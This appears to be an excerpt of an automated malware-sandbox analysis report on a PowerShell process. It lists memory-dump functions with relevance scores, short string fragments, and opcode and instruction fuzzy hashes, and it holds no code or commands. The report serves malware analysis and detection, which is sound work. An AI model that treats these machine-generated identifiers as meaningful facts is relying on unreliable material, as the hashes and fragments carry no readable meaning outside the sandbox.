                                                • Opcode Fuzzy Hash: b8788e9379e7f7a3c3fc51d5f9a83054ae20d0fcb9f38da76ffbe9262009e2a3
                                                • Instruction Fuzzy Hash: 6092B574F11219CFDBA4EB68C851B6ABBB2EF88310F1484AAD5459B385CB71DC81CF91
                                                Function 06DE7E08 Relevance: 23.2, Strings: 18, Instructions: 690COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$tPcq$tPcq$$cq$$cq$$cq$$cq$$cq$$cq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-4259045025
                                                • Opcode ID: 1388636a860d7dc13fdbdde74e5e8af81a434622166bc2effc20fc7546f5b8eb
                                                • Instruction ID: 38b6005065bdf027603beeb142899371c69c926032c0f92dfbb8f34eb4d3d619
                                                • Opcode Fuzzy Hash: 1388636a860d7dc13fdbdde74e5e8af81a434622166bc2effc20fc7546f5b8eb
                                                • Instruction Fuzzy Hash: CE323831F042058FDBA5AB69C8116BBBBF6AFC5210F14807AD556CB291DB32C841DBE1
                                                Function 06DE2AC8 Relevance: 20.6, Strings: 16, Instructions: 639COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$846l$846l$tPcq$tPcq$$cq$$cq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-2472556847
                                                • Opcode ID: 60c353e7eec6aa76e0e4528e14f24e7846c27218f3351820a393ffa3e879f935
                                                • Instruction ID: 1b12ca30db0576e601fc4b1589a9188d7414ac796fd05023f49ad28b373f7dcd
                                                • Opcode Fuzzy Hash: 60c353e7eec6aa76e0e4528e14f24e7846c27218f3351820a393ffa3e879f935
                                                • Instruction Fuzzy Hash: 3E225830F042459FDB65AF69C85067ABBB6AFC5310F1980ABD585CF292CB35CA41C7A1
                                                Function 06DE7568 Relevance: 10.3, Strings: 8, Instructions: 339COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$x.)k$-)k
                                                • API String ID: 0-1877580746
                                                • Opcode ID: 4cbee2ab62f8ca2c2d49977cff8f4cf3a2ab6ce39ed304ad414c90dffcdebfd5
                                                • Instruction ID: 8cdc7c387af670bea6df5389bfa757f78ff05ceca3b253c1aa80c07ee76b3279
                                                • Opcode Fuzzy Hash: 4cbee2ab62f8ca2c2d49977cff8f4cf3a2ab6ce39ed304ad414c90dffcdebfd5
                                                • Instruction Fuzzy Hash: 9CD16D70E102099FDB94EB68C451BAEBBB2EF88314F21C419D9066F395CB75EC85CB91
                                                Function 06DE675B Relevance: 9.1, Strings: 7, Instructions: 395COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f8l$(f8l$4'cq$4'cq$x.)k$x.)k$-)k
                                                • API String ID: 0-3424400339
                                                • Opcode ID: 2ca7f2f0277a4e32421de6c57a1946950a4e75d40a6a949dd36531c42309b2e1
                                                • Instruction ID: e01d7199d5ddc028a561ccefd7538c4333531fb97ede62985315694e6f0cd19a
                                                • Opcode Fuzzy Hash: 2ca7f2f0277a4e32421de6c57a1946950a4e75d40a6a949dd36531c42309b2e1
                                                • Instruction Fuzzy Hash: 06F17C70F102199FDB64EB68C851F6EBBB2EB84340F1080A9D50A6F395CB75ED818F95
                                                Function 06DE4EB8 Relevance: 8.2, Strings: 6, Instructions: 706COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f8l$(f8l$(f8l$(f8l$(f8l$(f8l
                                                • API String ID: 0-1925304144
                                                • Opcode ID: 963527aae0046056a2431df7744f51d49434666801e2e3c28a8235c1c70963eb
                                                • Instruction ID: 8b144c833815bef3b3c869bf63ae227bbc1724d21b7c267b66f47e6b7364aeb3
                                                • Opcode Fuzzy Hash: 963527aae0046056a2431df7744f51d49434666801e2e3c28a8235c1c70963eb
                                                • Instruction Fuzzy Hash: 23525A74E00208CFDB94DB58C495A5ABBB3EF89358F25C069D9099F355CB72EC82CB91
                                                Function 06DE5940 Relevance: 6.5, Strings: 5, Instructions: 275COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f8l$(f8l$(f8l$(f8l$x.)k
                                                • API String ID: 0-3675510234
                                                • Opcode ID: 70bdad06e99726b701055f46600d442da62da9e8a8c4c9762f29f91c6a70abfa
                                                • Instruction ID: f5cf91e1184ca91c3a0c2b19e3ca440e7610a3cb9af120b0601f89036ddc09f6
                                                • Opcode Fuzzy Hash: 70bdad06e99726b701055f46600d442da62da9e8a8c4c9762f29f91c6a70abfa
                                                • Instruction Fuzzy Hash: 4EB1AD74B102059FDB44EB68C451BAEBBF3AB88354F118068D9066F395CB76EC81CFA5
                                                Function 06DE755F Relevance: 6.5, Strings: 5, Instructions: 261COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$x.)k$-)k
                                                • API String ID: 0-2464013021
                                                • Opcode ID: c7c8ee50e63032c654216b96dbb5b36904c213fb4f24458811f2b7365a1c1a61
                                                • Instruction ID: cfda69377719560094d85f8dc733f203716605c69647cd42721a06dfdb3af721
                                                • Opcode Fuzzy Hash: c7c8ee50e63032c654216b96dbb5b36904c213fb4f24458811f2b7365a1c1a61
                                                • Instruction Fuzzy Hash: 56A18D30E102089FDB94EB68C450BAEBBB2EF88314F25C419D9056F395CB75E886CF91
                                                Function 06DE9F28 Relevance: 5.6, Strings: 4, Instructions: 576COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq
                                                • API String ID: 0-1446110543
                                                • Opcode ID: dacf8296826b9fc921674d88925623a4bec38bbbb23b38bd8d6df3e462c0e0c5
                                                • Instruction ID: 0621d5df67daa1a09b8dcdadd2bc9cf8e3c914743aa5a9f88d41cfadb0493b8e
                                                • Opcode Fuzzy Hash: dacf8296826b9fc921674d88925623a4bec38bbbb23b38bd8d6df3e462c0e0c5
                                                • Instruction Fuzzy Hash: 05125931B042568FDB61AB79881176ABBB6AFC5320F18807BD545CF291DB35CD81CBE2
                                                Function 06DE5937 Relevance: 4.0, Strings: 3, Instructions: 246COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f8l$(f8l$x.)k
                                                • API String ID: 0-1927618032
                                                • Opcode ID: 50ae6fb49f8f0de2ab84c0087bf67a74c3d55b68a66b871634c1025c62273450
                                                • Instruction ID: 127a31634c9dc5e9d27e0502b0420a41ee48fbfb55170d656f2eba75fe88cb2f
                                                • Opcode Fuzzy Hash: 50ae6fb49f8f0de2ab84c0087bf67a74c3d55b68a66b871634c1025c62273450
                                                • Instruction Fuzzy Hash: 9DA19C74F002059FDB54EB64D491FAABBF2EB88398F118069D5056B395CB76EC81CFA0
                                                Function 06DE4E98 Relevance: 3.0, Strings: 2, Instructions: 522COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f8l$(f8l
                                                • API String ID: 0-1662554418
                                                • Opcode ID: 56d221fd0847b0df8c04873999916bd7f5ef3c26858519c1ee2f63b1e5367ddb
                                                • Instruction ID: 1467d69b2277af7a34724a923a247240bbf6759748a5b212f2866c743047c27c
                                                • Opcode Fuzzy Hash: 56d221fd0847b0df8c04873999916bd7f5ef3c26858519c1ee2f63b1e5367ddb
                                                • Instruction Fuzzy Hash: F3224934A00204CFDBA4DB58C595E59FBB2EF89758F24C059D909AF356CB72EC82CB91
                                                Function 06DE8880 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq
                                                • API String ID: 0-60795322
                                                • Opcode ID: 07ebe0d7115cdffc094dea4fc671b14bf7f6771dc3a827fede30e206ddb05ddf
                                                • Instruction ID: 2bacbfa3f7bc16876c53d24ab423efba6b5e11d1d0b72ca70f978b97aa7d7246
                                                • Opcode Fuzzy Hash: 07ebe0d7115cdffc094dea4fc671b14bf7f6771dc3a827fede30e206ddb05ddf
                                                • Instruction Fuzzy Hash: 9DF02420F0824D8FDBA5263868A423B7BA2BBC411031041BACE828B2D5DF24CC11D3E2
                                                Function 06DE1220 Relevance: 1.7, Strings: 1, Instructions: 452COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: `B*k
                                                • API String ID: 0-3698787657
                                                • Opcode ID: b9a06a94c59b04ff7666e30bfa3bed707b86c137a2dc4a22c270fbf7a6684e26
                                                • Instruction ID: 0df76d841667563c690a92e286cf43cf81b34648facfc057cc148cac6070832e
                                                • Opcode Fuzzy Hash: b9a06a94c59b04ff7666e30bfa3bed707b86c137a2dc4a22c270fbf7a6684e26
                                                • Instruction Fuzzy Hash: D7025F34F002089FD794DB58C895A6ABBF2EF89714F14C06AE9159B355CB32EC85CB91
                                                Function 06DE5599 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f8l
                                                • API String ID: 0-1526955735
                                                • Opcode ID: fdef35d5304859c62b0f66e47be895f4558f8ee5bba6167dfea173cf06077d6d
                                                • Instruction ID: 038a8ee074442670f9138c2a92a08229e0f8178a96cc6163ac188d495d073957
                                                • Opcode Fuzzy Hash: fdef35d5304859c62b0f66e47be895f4558f8ee5bba6167dfea173cf06077d6d
                                                • Instruction Fuzzy Hash: D3F16A34A00204CFDB90DB58C495E6EBBB6EF89358F14C069D909AF355CB76EC86CB91
                                                Function 06DE15D8 Relevance: 1.6, Strings: 1, Instructions: 350COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: h2+k
                                                • API String ID: 0-1412002999
                                                • Opcode ID: 060fdee223bcae04eb587fe2b52170d5b3a704502e3a1b9e0d7a8d5ce81b5ac1
                                                • Instruction ID: bd97a410dee91cef58859457a202cff708edd33c3d9e9a250f63b0127b05bbaa
                                                • Opcode Fuzzy Hash: 060fdee223bcae04eb587fe2b52170d5b3a704502e3a1b9e0d7a8d5ce81b5ac1
                                                • Instruction Fuzzy Hash: 91D16A34B00204DFD794DB58C995AAABBF2EF89714F14C069E905AF391CB72ED81CB91
                                                Function 06DE798E Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: x.)k
                                                • API String ID: 0-591010750
                                                • Opcode ID: b2748edbc0be2514b1c0c46691acca5a9ebd28da897ad9a32da1be8992848e69
                                                • Instruction ID: 5c8a80ab8ecbb611b709d2aca86adc9d4ce07b0fc5fbad72f564ecb97d78749f
                                                • Opcode Fuzzy Hash: b2748edbc0be2514b1c0c46691acca5a9ebd28da897ad9a32da1be8992848e69
                                                • Instruction Fuzzy Hash: 00318074B501189BD744A764C865FAFBBA3EB88354F208418E9066F381CFB9EC468BD1
                                                Function 029FF314 Relevance: .3, Instructions: 286COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2736930652.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_29f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7b2769a1408a9bed807692c5761763ac4056a6e2c4a9be185359f956beda2f27
                                                • Instruction ID: af8d7ae48b6a82d87820172bd77b81a8625461a0b42e0c9496f4a5b67e54408c
                                                • Opcode Fuzzy Hash: 7b2769a1408a9bed807692c5761763ac4056a6e2c4a9be185359f956beda2f27
                                                • Instruction Fuzzy Hash: CEB16E70E002098FDBA0CFA8D8857EDBBF6BF48318F148129D919A7694EB749845CF91
                                                Function 029FFBE4 Relevance: .3, Instructions: 264COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2736930652.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_29f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 91113a0d0af1b8d4737018a56a80e8ebfe23f8b8707c56f51c27a086481e8bb7
                                                • Instruction ID: 57eda143a57f05bc3f1772268b7594ee4c394510164e4f3a15b3b81b0e107b5d
                                                • Opcode Fuzzy Hash: 91113a0d0af1b8d4737018a56a80e8ebfe23f8b8707c56f51c27a086481e8bb7
                                                • Instruction Fuzzy Hash: E7B17D71E0020ACFDB90CFA8D8857DDBBF6AF48718F148129E919E7694EB749845CF81
                                                Function 029FF95D Relevance: .2, Instructions: 183COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2736930652.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_29f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9e5f41b91276f7884c603b9aa298b4bd277cce15f3b6bd62da0763fac4f686c7
                                                • Instruction ID: e4296c9176cc7f9546e290daee23060f871e8ea411a1e47955a1b6041efff64a
                                                • Opcode Fuzzy Hash: 9e5f41b91276f7884c603b9aa298b4bd277cce15f3b6bd62da0763fac4f686c7
                                                • Instruction Fuzzy Hash: 46716E71E003099FDB90CFA9C8857DDBBF6AF88314F148029D519A7694EB749846CF91
                                                Function 029FF968 Relevance: .2, Instructions: 180COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2736930652.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_29f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a9fe546d6f95d6e2f62721b1afa360ab0a7f178d9752feb5452484010219a513
                                                • Instruction ID: 39827f8cee76794e579b03835d0856b91eb27576b081e24568e9cc5c744f40ce
                                                • Opcode Fuzzy Hash: a9fe546d6f95d6e2f62721b1afa360ab0a7f178d9752feb5452484010219a513
                                                • Instruction Fuzzy Hash: E0716E71E003099FDF90CFA9C88479EBBF6EF88314F148029D519A76A4EB749846CF91
                                                Function 06DE9F0C Relevance: .1, Instructions: 121COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 818582e0ce7ceb53e21c9d9a415a904aa946c53fa9fd5c05aa9ad41f317c7d08
                                                • Instruction ID: 4f85cdef762c862d7664a531ec634cd29d711bdde455ec1536b046436d256cfb
                                                • Opcode Fuzzy Hash: 818582e0ce7ceb53e21c9d9a415a904aa946c53fa9fd5c05aa9ad41f317c7d08
                                                • Instruction Fuzzy Hash: 34415D34E01202DFCBA1AF29846177ABBB6EF85350B1980A9E9409F259D739CD81C7E5
                                                Function 06DE0EE0 Relevance: .1, Instructions: 94COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b14715c680cfe06881a9f9fba2a85c2e12075406d79d8ca632b4f76e901abe9c
                                                • Instruction ID: 53a0beb1daf9d0fba1aa2f83f63fe973081bfdc8b58037ccc422c875279ec81c
                                                • Opcode Fuzzy Hash: b14715c680cfe06881a9f9fba2a85c2e12075406d79d8ca632b4f76e901abe9c
                                                • Instruction Fuzzy Hash: 53216B31B003155BDBA06ABA4861B3BB6DA9FC5325F24C43AA545CB3C1CDB9C871C7A9
                                                Function 06DE0EC4 Relevance: .1, Instructions: 81COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 841d5691e44ab875480f223379f6ed84427d72fd265ed35fe735dc5483bb8d7f
                                                • Instruction ID: 02c76dc6eae9ae7f2960d738489f018af4f572c6e19ffefff7a195cdd05be4f5
                                                • Opcode Fuzzy Hash: 841d5691e44ab875480f223379f6ed84427d72fd265ed35fe735dc5483bb8d7f
                                                • Instruction Fuzzy Hash: 39217C307043446BD7A01F6648507667BA69FD6320F148025E980CB2C2C9BCCDB5C7A9
                                                Function 029FC3BC Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2736930652.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_29f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 91fa47445e4af29d9a2cc0cb56ec9609690eb19d6b46ba95805167708457609b
                                                • Instruction ID: 23ec155a2b233a86411056fbb0fee6255bfc018753134d3496480ae3f7933223
                                                • Opcode Fuzzy Hash: 91fa47445e4af29d9a2cc0cb56ec9609690eb19d6b46ba95805167708457609b
                                                • Instruction Fuzzy Hash: C7310F30B012288FCB66EF34D854AAEB7B6AF89304F0544E9D509AB351DF358E81CF91
                                                Function 06DE0CD0 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 038a9f8a706c3378f6f5909001406cb1270badcd74dc6a71d221436cded55881
                                                • Instruction ID: 3ee1ce1b15f8e142cfb728f6474f8bc2a8fd61d78d6a94d94eef9d4e4b442b25
                                                • Opcode Fuzzy Hash: 038a9f8a706c3378f6f5909001406cb1270badcd74dc6a71d221436cded55881
                                                • Instruction Fuzzy Hash: CB012B3E7002199BDB606AAAD400577FBDADFC5222F14C03FD989CB641DA72D865C7A0
                                                Function 029FF60B Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2736930652.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_29f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9a1fab14df50e17e3983c1093395514abb19ec52c1bb29fb67a2fa9247d6121f
                                                • Instruction ID: cba91bf28de324b84e54a97e6b56698f4b47b1b9747d7f77352b27c41557460e
                                                • Opcode Fuzzy Hash: 9a1fab14df50e17e3983c1093395514abb19ec52c1bb29fb67a2fa9247d6121f
                                                • Instruction Fuzzy Hash: CB119D30D0024CDBDFB49B94D5987ACB7BAAB4531DF25242AC201B69E0EF74588ACF12
                                                Function 06DE30AC Relevance: .0, Instructions: 21COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eb0a2730adc805a82046eca105a0477cc67026239e7a86ebc9620b3374ea61a4
                                                • Instruction ID: 149a5521324ab975a67f2338fb00702379feb7f4b88bc1ce8343371262f963b0
                                                • Opcode Fuzzy Hash: eb0a2730adc805a82046eca105a0477cc67026239e7a86ebc9620b3374ea61a4
                                                • Instruction Fuzzy Hash: 0CE06530B09280DFD7529F52C894A20BBB2AF82204B0EC0CBC0848F1A3C777D846CB40

                                                Non-executed Functions

                                                Function 029F8870 Relevance: .1, Instructions: 73COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2736930652.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_29f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cba42298632599ad1b43780b4fcbc18503c6d0587c87896795c5e99c678a69b7
                                                • Instruction ID: 04f653a2e783366fb6316e17e062aba7171922be6782762fdb9da7bd04ce624d
                                                • Opcode Fuzzy Hash: cba42298632599ad1b43780b4fcbc18503c6d0587c87896795c5e99c678a69b7
                                                • Instruction Fuzzy Hash: 722157747006098FC744DB39C8808AABBF6FF8A20075044A9E502CB771DA70ED14CBA0
                                                Function 06DECA00 Relevance: 20.4, Strings: 16, Instructions: 371COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq$846l$846l$d%iq$d%iq$d%iq$d%iq$tPcq$tPcq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-3917106670
                                                • Opcode ID: 53a00df913b90fe5bf7b2f57c6c453f5386ba9f60f76e02893693673592c7b08
                                                • Instruction ID: 560c6c0122aea12b86cf1be33d4e82d16a699f2fbcf2f602771967e47b4ae685
                                                • Opcode Fuzzy Hash: 53a00df913b90fe5bf7b2f57c6c453f5386ba9f60f76e02893693673592c7b08
                                                • Instruction Fuzzy Hash: A9C11B35F20219DFDB65AF69C851A6BBBF2BFC8610F14806AD865CB381DB31C941C7A1
                                                Function 06DED351 Relevance: 17.7, Strings: 14, Instructions: 189COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$846l$846l$846l$846l$tPcq$tPcq$tPcq$tPcq$(iq$(iq$(iq$(iq
                                                • API String ID: 0-1217848463
                                                • Opcode ID: 9d6c5dc1e5133c87801495c6b423b61605688a3dec250b4724d07c006d13154c
                                                • Instruction ID: 55baa14c1180fb46589b12c619e0cef9465d8cb4beea8e8ca404e4bd8bac1a39
                                                • Opcode Fuzzy Hash: 9d6c5dc1e5133c87801495c6b423b61605688a3dec250b4724d07c006d13154c
                                                • Instruction Fuzzy Hash: 6661AF70B001199FDB54AF59C841A6ABBB3AF89314F25845AE845AF385CF31EC41CBE6
                                                Function 06DECF28 Relevance: 16.5, Strings: 13, Instructions: 248COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$846l$846l$TQhq$TQhq$TQhq$tPcq$tPcq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-166928734
                                                • Opcode ID: 240cef9143a925fc9ff5855eb58ba604d86535f7265063b5d6fbfd2cdb0b6a18
                                                • Instruction ID: 38ecd2cb32c2fcdf8cfc8c414c86675ce6a94333eca0bcbad5ee94e4b344aebf
                                                • Opcode Fuzzy Hash: 240cef9143a925fc9ff5855eb58ba604d86535f7265063b5d6fbfd2cdb0b6a18
                                                • Instruction Fuzzy Hash: 44911530B10209DFDB65AF69C8046ABBBB3BF84311F58846AE8558B295CF35DC51CBE1
                                                Function 06DE95A8 Relevance: 14.2, Strings: 11, Instructions: 487COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$tPcq$tPcq$$cq$$cq$$cq$.l$.l$.l$.l
                                                • API String ID: 0-545683709
